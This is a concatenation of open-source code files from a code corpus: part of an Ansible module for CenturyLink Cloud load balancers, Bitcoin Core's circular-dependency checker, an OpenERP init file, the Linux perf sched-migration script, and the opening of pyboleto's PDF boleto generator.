pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if pool_id:
changed, result = self.add_lbpool_nodes(alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id,
nodes_to_add=nodes)
else:
result = "Pool doesn't exist"
else:
result = "Load balancer doesn't Exist"
return changed, result
def ensure_lbpool_nodes_absent(self, alias, location, name, port, nodes):
"""
Checks to see if the provided list of nodes exist for the pool and removes them if found any
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param name: the name of the load balancer
:param port: the port that the load balancer will listen on
:param nodes: the list of nodes to be removed
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
lb_id = self._get_loadbalancer_id(name=name)
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if pool_id:
changed, result = self.remove_lbpool_nodes(alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id,
nodes_to_remove=nodes)
else:
result = "Pool doesn't exist"
else:
result = "Load balancer doesn't Exist"
return changed, result
def create_loadbalancer(self, name, alias, location, description, status):
"""
Create a loadbalancer w/ params
:param name: Name of loadbalancer
:param alias: Alias of account
:param location: Datacenter
:param description: Description for loadbalancer to be created
:param status: Enabled / Disabled
:return: result: The result from the CLC API call
"""
result = None
try:
result = self.clc.v2.API.Call('POST',
'/v2/sharedLoadBalancers/%s/%s' % (alias,
location),
json.dumps({"name": name,
"description": description,
"status": status}))
sleep(1)
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to create load balancer "{0}". {1}'.format(
name, str(e.response_text)))
return result
def create_loadbalancerpool(
self, alias, location, lb_id, method, persistence, port):
"""
Creates a pool on the provided load balancer
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param method: the load balancing method
:param persistence: the load balancing persistence type
:param port: the port that the load balancer will listen on
:return: result: The result from the create API call
"""
result = None
try:
result = self.clc.v2.API.Call(
'POST', '/v2/sharedLoadBalancers/%s/%s/%s/pools' %
(alias, location, lb_id), json.dumps(
{
"port": port, "method": method, "persistence": persistence
}))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to create pool for load balancer id "{0}". {1}'.format(
lb_id, str(e.response_text)))
return result
def delete_loadbalancer(self, alias, location, name):
"""
Delete CLC loadbalancer
:param alias: Alias for account
:param location: Datacenter
:param name: Name of the loadbalancer to delete
:return: result: The result from the CLC API call
"""
result = None
lb_id = self._get_loadbalancer_id(name=name)
try:
result = self.clc.v2.API.Call(
'DELETE', '/v2/sharedLoadBalancers/%s/%s/%s' %
(alias, location, lb_id))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to delete load balancer "{0}". {1}'.format(
name, str(e.response_text)))
return result
def delete_loadbalancerpool(self, alias, location, lb_id, pool_id):
"""
Delete the pool on the provided load balancer
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the load balancer pool
:return: result: The result from the delete API call
"""
result = None
try:
result = self.clc.v2.API.Call(
'DELETE', '/v2/sharedLoadBalancers/%s/%s/%s/pools/%s' %
(alias, location, lb_id, pool_id))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to delete pool for load balancer id "{0}". {1}'.format(
lb_id, str(e.response_text)))
return result
def _get_loadbalancer_id(self, name):
"""
Retrieves unique ID of loadbalancer
:param name: Name of loadbalancer
:return: Unique ID of the loadbalancer
"""
        lb_id = None
        for lb in self.lb_dict:
            if lb.get('name') == name:
                lb_id = lb.get('id')
        return lb_id
def _get_loadbalancer_list(self, alias, location):
"""
Retrieve a list of loadbalancers
:param alias: Alias for account
:param location: Datacenter
:return: JSON data for all loadbalancers at datacenter
"""
result = None
try:
result = self.clc.v2.API.Call(
'GET', '/v2/sharedLoadBalancers/%s/%s' % (alias, location))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to fetch load balancers for account: {0}. {1}'.format(
alias, str(e.response_text)))
return result
def _loadbalancer_exists(self, name):
"""
Verify a loadbalancer exists
:param name: Name of loadbalancer
:return: False or the ID of the existing loadbalancer
"""
result = False
for lb in self.lb_dict:
if lb.get('name') == name:
result = lb.get('id')
return result
def _loadbalancerpool_exists(self, alias, location, port, lb_id):
"""
Checks to see if a pool exists on the specified port on the provided load balancer
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param port: the port to check and see if it exists
:param lb_id: the id string of the provided load balancer
:return: result: The id string of the pool or False
"""
result = False
try:
pool_list = self.clc.v2.API.Call(
'GET', '/v2/sharedLoadBalancers/%s/%s/%s/pools' %
(alias, location, lb_id))
except APIFailedResponse as e:
return self.module.fail_json(
                msg='Unable to fetch the load balancer pools for load balancer id: {0}. {1}'.format(
lb_id, str(e.response_text)))
for pool in pool_list:
if int(pool.get('port')) == int(port):
result = pool.get('id')
return result
def _loadbalancerpool_nodes_exists(
self, alias, location, lb_id, pool_id, nodes_to_check):
"""
Checks to see if a set of nodes exists on the specified port on the provided load balancer
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the provided load balancer
:param pool_id: the id string of the load balancer pool
:param nodes_to_check: the list of nodes to check for
:return: result: True / False indicating if the given nodes exist
"""
        nodes = self._get_lbpool_nodes(alias, location, lb_id, pool_id)
        for node in nodes_to_check:
            if not node.get('status'):
                node['status'] = 'enabled'
            if node not in nodes:
                # A single missing node means the full set is not present.
                return False
        return True
def set_loadbalancernodes(self, alias, location, lb_id, pool_id, nodes):
"""
Updates nodes to the provided pool
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the pool
:param nodes: a list of dictionaries containing the nodes to set
:return: result: The result from the CLC API call
"""
result = None
if not lb_id:
return result
if not self.module.check_mode:
try:
result = self.clc.v2.API.Call('PUT',
'/v2/sharedLoadBalancers/%s/%s/%s/pools/%s/nodes'
% (alias, location, lb_id, pool_id), json.dumps(nodes))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to set nodes for the load balancer pool id "{0}". {1}'.format(
pool_id, str(e.response_text)))
return result
def add_lbpool_nodes(self, alias, location, lb_id, pool_id, nodes_to_add):
"""
Add nodes to the provided pool
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the pool
:param nodes_to_add: a list of dictionaries containing the nodes to add
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
result = {}
nodes = self._get_lbpool_nodes(alias, location, lb_id, pool_id)
for node in nodes_to_add:
if not node.get('status'):
node['status'] = 'enabled'
            if node not in nodes:
changed = True
nodes.append(node)
        if changed and not self.module.check_mode:
result = self.set_loadbalancernodes(
alias,
location,
lb_id,
pool_id,
nodes)
return changed, result
def remove_lbpool_nodes(
self, alias, location, lb_id, pool_id, nodes_to_remove):
"""
Removes nodes from the provided pool
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the pool
:param nodes_to_remove: a list of dictionaries containing the nodes to remove
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
result = {}
nodes = self._get_lbpool_nodes(alias, location, lb_id, pool_id)
for node in nodes_to_remove:
if not node.get('status'):
node['status'] = 'enabled'
if node in nodes:
changed = True
nodes.remove(node)
        if changed and not self.module.check_mode:
result = self.set_loadbalancernodes(
alias,
location,
lb_id,
pool_id,
nodes)
return changed, result
def _get_lbpool_nodes(self, alias, location, lb_id, pool_id):
"""
Return the list of nodes available to the provided load balancer pool
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the pool
:return: result: The list of nodes
"""
result = None
try:
result = self.clc.v2.API.Call('GET',
'/v2/sharedLoadBalancers/%s/%s/%s/pools/%s/nodes'
% (alias, location, lb_id, pool_id))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to fetch list of available nodes for load balancer pool id: {0}. {1}'.format(
pool_id, str(e.response_text)))
return result
@staticmethod
def define_argument_spec():
"""
Define the argument spec for the ansible module
:return: argument spec dictionary
"""
argument_spec = dict(
name=dict(required=True),
description=dict(default=None),
location=dict(required=True, default=None),
alias=dict(required=True, default=None),
port=dict(choices=[80, 443]),
method=dict(choices=['leastConnection', 'roundRobin']),
persistence=dict(choices=['standard', 'sticky']),
nodes=dict(type='list', default=[]),
status=dict(default='enabled', choices=['enabled', 'disabled']),
state=dict(
default='present',
choices=[
'present',
'absent',
'port_absent',
'nodes_present',
'nodes_absent'])
)
return argument_spec
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
"""
The main function. Instantiates the module and calls process_request.
:return: none
"""
module = AnsibleModule(argument_spec=ClcLoadBalancer.define_argument_spec(),
supports_check_mode=True)
clc_loadbalancer = ClcLoadBalancer(module)
clc_loadbalancer.process_request()
from ansible.module_utils.basic import * # pylint: disable=W0614
if __name__ == '__main__':
main()
| gpl-3.0 |
practicalswift/bitcoin | contrib/devtools/circular-dependencies.py | 29 | 3219 | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import sys
import re
from typing import Dict, List, Set
MAPPING = {
'core_read.cpp': 'core_io.cpp',
'core_write.cpp': 'core_io.cpp',
}
# Directories with header-based modules, where the assumption that .cpp files
# define functions and variables declared in corresponding .h files is
# incorrect.
HEADER_MODULE_PATHS = [
'interfaces/'
]
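# Hypothetical invocation (the source files to scan are passed as arguments):
#   python3 circular-dependencies.py src/*.cpp src/*.h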
def module_name(path):
if path in MAPPING:
path = MAPPING[path]
if any(path.startswith(dirpath) for dirpath in HEADER_MODULE_PATHS):
return path
if path.endswith(".h"):
return path[:-2]
if path.endswith(".c"):
return path[:-2]
if path.endswith(".cpp"):
return path[:-4]
return None
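# For example, module_name('core_read.cpp') first remaps to 'core_io.cpp' via
# MAPPING and then strips the extension, yielding module 'core_io'.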
files = dict()
deps: Dict[str, Set[str]] = dict()
RE = re.compile("^#include <(.*)>")
# Iterate over files, and create list of modules
for arg in sys.argv[1:]:
module = module_name(arg)
if module is None:
print("Ignoring file %s (does not constitute module)\n" % arg)
else:
files[arg] = module
deps[module] = set()
# Iterate again, and build list of direct dependencies for each module
# TODO: implement support for multiple include directories
for arg in sorted(files.keys()):
module = files[arg]
with open(arg, 'r', encoding="utf8") as f:
for line in f:
match = RE.match(line)
if match:
include = match.group(1)
included_module = module_name(include)
if included_module is not None and included_module in deps and included_module != module:
deps[module].add(included_module)
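# Worked example: given a.cpp containing '#include <b.h>' and b.cpp containing
# '#include <a.h>' (with all four files passed on the command line), deps ends
# up as {'a': {'b'}, 'b': {'a'}} and the search below reports a -> b -> a.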
# Loop to find the shortest (remaining) circular dependency
have_cycle: bool = False
while True:
shortest_cycle = None
for module in sorted(deps.keys()):
# Build the transitive closure of dependencies of module
closure: Dict[str, List[str]] = dict()
for dep in deps[module]:
closure[dep] = []
while True:
old_size = len(closure)
old_closure_keys = sorted(closure.keys())
for src in old_closure_keys:
for dep in deps[src]:
if dep not in closure:
closure[dep] = closure[src] + [src]
if len(closure) == old_size:
break
# If module is in its own transitive closure, it's a circular dependency; check if it is the shortest
if module in closure and (shortest_cycle is None or len(closure[module]) + 1 < len(shortest_cycle)):
shortest_cycle = [module] + closure[module]
if shortest_cycle is None:
break
# We have the shortest circular dependency; report it
module = shortest_cycle[0]
print("Circular dependency: %s" % (" -> ".join(shortest_cycle + [module])))
# And then break the dependency to avoid repeating in other cycles
deps[shortest_cycle[-1]] = deps[shortest_cycle[-1]] - set([module])
have_cycle = True
sys.exit(1 if have_cycle else 0)
| mit |
florian-dacosta/OCB | openerp/addons/base/module/report/__init__.py | 463 | 1089 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import ir_module_reference_print
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
detule/lge-linux-msm | tools/perf/scripts/python/sched-migration.py | 11215 | 11670 | #!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
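		# If prev is still runnable and both tasks are already tracked,
		# the runqueue membership is unchanged: reuse this snapshot as-is.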
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
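    # find_time_slice() is a plain binary search over the time-ordered slices:
    # it returns the index of a slice whose [start, end] interval contains ts,
    # or -1 when no slice covers that timestamp.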
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid):
pass
def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
pass
| gpl-2.0 |
lojaintegrada/pyboleto | pyboleto/pdf.py | 1 | 30840 | # -*- coding: utf-8 -*-
"""
pyboleto.pdf
~~~~~~~~~~~~
Class responsible for rendering the boleto as a PDF using ReportLab.
:copyright: © 2011 - 2012 by Eduardo Cereto Carvalho
:license: BSD, see LICENSE for more details.
"""
import os
from reportlab.graphics.barcode.common import I2of5
from reportlab.lib.colors import black
from reportlab.lib.pagesizes import A4, landscape as pagesize_landscape
from reportlab.lib.units import mm, cm
from reportlab.lib.utils import simpleSplit
from reportlab.pdfbase.pdfmetrics import stringWidth
from reportlab.pdfgen import canvas
class BoletoPDF(object):
"""Geração do Boleto em PDF
Esta classe é responsável por imprimir o boleto em PDF.
Outras classes podem ser implementadas no futuro com a mesma interface,
para fazer output em HTML, LaTeX, ...
Esta classe pode imprimir boletos em formato de carnê (2 boletos por
página) ou em formato de folha cheia.
:param file_descr: Um arquivo ou *file-like* class.
:param landscape: Formato da folha. Usar ``True`` para boleto
tipo carnê.
"""
def __init__(self, file_descr, landscape=False):
self.width = 190 * mm
self.widthCanhoto = 70 * mm
self.heightLine = 6.5 * mm
self.space = 2
self.fontSizeTitle = 6
self.fontSizeValue = 9
self.deltaTitle = self.heightLine - (self.fontSizeTitle + 1)
self.deltaFont = self.fontSizeValue + 1
if landscape:
pagesize = pagesize_landscape(A4)
else:
pagesize = A4
self.pdfCanvas = canvas.Canvas(file_descr, pagesize=pagesize)
self.pdfCanvas.setStrokeColor(black)
def _load_image(self, logo_image):
pyboleto_dir = os.path.dirname(os.path.abspath(__file__))
image_path = os.path.join(pyboleto_dir, 'media', logo_image)
return image_path
def _drawReciboSacadoCanhoto(self, boletoDados, x, y):
"""Imprime o Recibo do Sacado para modelo de carnê
:param boletoDados: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados: :class:`pyboleto.data.BoletoData`
"""
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
linhaInicial = 12
# Horizontal Lines
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0, 0, self.widthCanhoto)
self.pdfCanvas.setLineWidth(1)
self.__horizontalLine(0,
(linhaInicial + 0) * self.heightLine,
self.widthCanhoto)
self.__horizontalLine(0,
(linhaInicial + 1) * self.heightLine,
self.widthCanhoto)
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0,
(linhaInicial + 2) * self.heightLine,
self.widthCanhoto)
# Vertical Lines
self.pdfCanvas.setLineWidth(1)
self.__verticalLine(self.widthCanhoto - (35 * mm),
(linhaInicial + 0) * self.heightLine,
self.heightLine)
self.__verticalLine(self.widthCanhoto - (35 * mm),
(linhaInicial + 1) * self.heightLine,
self.heightLine)
self.pdfCanvas.setFont('Helvetica-Bold', 6)
self.pdfCanvas.drawRightString(self.widthCanhoto,
0 * self.heightLine + 3,
'Recibo do Pagador')
# Titles
self.pdfCanvas.setFont('Helvetica', 6)
self.deltaTitle = self.heightLine - (6 + 1)
self.pdfCanvas.drawString(
self.space,
(((linhaInicial + 0) * self.heightLine)) + self.deltaTitle,
'Nosso Número'
)
self.pdfCanvas.drawString(
self.widthCanhoto - (35 * mm) + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.deltaTitle,
'Vencimento'
)
self.pdfCanvas.drawString(
self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Agência/Código do Beneficiário'
)
self.pdfCanvas.drawString(
self.widthCanhoto - (35 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.deltaTitle,
'Valor Documento'
)
# Values
self.pdfCanvas.setFont('Helvetica', 9)
heighFont = 9 + 1
valorDocumento = self._formataValorParaExibir(
boletoDados.valor_documento
)
self.pdfCanvas.drawString(
self.space,
(((linhaInicial + 0) * self.heightLine)) + self.space,
boletoDados.format_nosso_numero()
)
self.pdfCanvas.drawString(
self.widthCanhoto - (35 * mm) + self.space,
(((linhaInicial + 0) * self.heightLine)) + self.space,
boletoDados.data_vencimento.strftime('%d/%m/%Y')
)
self.pdfCanvas.drawString(
self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
boletoDados.agencia_conta_cedente
)
self.pdfCanvas.drawString(
self.widthCanhoto - (35 * mm) + self.space,
(((linhaInicial + 1) * self.heightLine)) + self.space,
valorDocumento
)
demonstrativo = boletoDados.demonstrativo[0:12]
for i in range(len(demonstrativo)):
self.pdfCanvas.drawString(
2 * self.space,
(((linhaInicial - 1) * self.heightLine)) - (i * heighFont),
demonstrativo[i][0:55]
)
self.pdfCanvas.restoreState()
return (self.widthCanhoto,
((linhaInicial + 2) * self.heightLine))
def _drawReciboSacado(self, boletoDados, x, y):
"""Imprime o Recibo do Sacado para modelo de página inteira
:param boletoDados: Objeto com os dados do boleto a ser preenchido.
Deve ser subclasse de :class:`pyboleto.data.BoletoData`
:type boletoDados: :class:`pyboleto.data.BoletoData`
"""
self.pdfCanvas.saveState()
self.pdfCanvas.translate(x, y)
linhaInicial = 15
# Horizontal Lines
self.pdfCanvas.setLineWidth(1)
self.__horizontalLine(0,
(linhaInicial + 0) * self.heightLine,
self.width)
self.__horizontalLine(0,
(linhaInicial + 1) * self.heightLine,
self.width)
self.__horizontalLine(0,
(linhaInicial + 2) * self.heightLine,
self.width)
self.pdfCanvas.setLineWidth(2)
self.__horizontalLine(0,
(linhaInicial + 3) * self.heightLine,
